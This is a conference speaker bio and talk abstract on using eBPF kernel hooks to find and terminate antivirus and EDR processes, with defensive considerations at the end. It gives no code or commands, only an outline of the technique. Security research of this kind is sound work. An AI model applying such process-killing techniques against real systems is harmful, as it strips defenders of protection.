Donato Onofri
Senior Red Team Engineer
CrowdStrike
Donato Onofri is a seasoned Red Team Engineer. His research delves into state-of-the-art offensive techniques, malware analysis, and internals. He is also the co-author of the book Attacking and Exploiting Modern Web Applications.
Speaker sessions
eBPF Warfare: Subverting Security Solutions Through Kernel-Space Manipulation
Extended Berkeley Packet Filter (eBPF) has revolutionized Linux kernel observability and networking, but its powerful capabilities can be weaponized against security solutions. This talk explores how attackers can leverage eBPF primitives to identify, track, and terminate security processes, including antivirus solutions and EDR tools.We'll demonstrate how eBPF's kernel-level access can be exploited to create sophisticated process killing mechanisms that operate below traditional security controls. Through practical examples, we'll showcase techniques for process termination that bypass common protection mechanisms.Key topics include:Essential eBPF hooks for process manipulationQuick-win termination techniquesLive demo of security tool subversionCritical defensive considerationsThe presentation concludes with defensive considerations, detection methods, and mitigation strategies for security vendors and defenders. This research highlights the growing need for security solutions to adapt to kernel-level threats and implement stronger self-protection mechanisms.
- 15:20
- Tue
- 02 Dec
Stage:
Briefings 1
Sessions Type:
Presentation